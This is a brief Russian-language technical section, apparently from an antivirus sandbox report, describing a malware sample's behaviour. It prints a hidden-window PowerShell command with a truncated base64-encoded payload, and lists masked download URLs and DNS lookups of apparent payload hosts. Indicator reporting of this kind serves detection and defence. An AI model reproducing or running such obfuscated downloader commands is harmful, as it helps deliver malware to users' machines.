Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABLAHEAbABkAGYAbQBiAHYAcgA9ACcAWABpAGQAdgBvAHIAYgBrAGsAYwBnAHQAYQAnADsAJABGAHkAbQBiAGgAeQBlAHgAbQBoACAAPQAgACcANQA5ADMAJwA7ACQATgBuAHIAZwBxAGkAawBrAGYAcQB5AD0AJwBCAGoAcwBwAGMAcAB...
- http://on###games.jp/contact/iY/
- http://pm##ome.com/posta/dr3zxa/
- http://ur###enta.es/img/k35d9q/
- DNS ASK on###games.jp
- DNS ASK pm##ome.com
- DNS ASK ur###enta.es
- DNS ASK so###c.com.ar
- DNS ASK ti####ambara.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABLAHEAbABkAGYAbQBiAHYAcgA9ACcAWABpAGQAdgBvAHIAYgBrAGsAYwBnAHQAYQAnADsAJABGAHkAbQBiAGgAeQBlAHgAbQBoACAAPQAgACcANQA5ADMAJwA7ACQATgBuAHIAZwBxAGkAawBrAGYAcQB5AD0AJwBCAGoAcwBwAGMAcAB...' (со скрытым окном)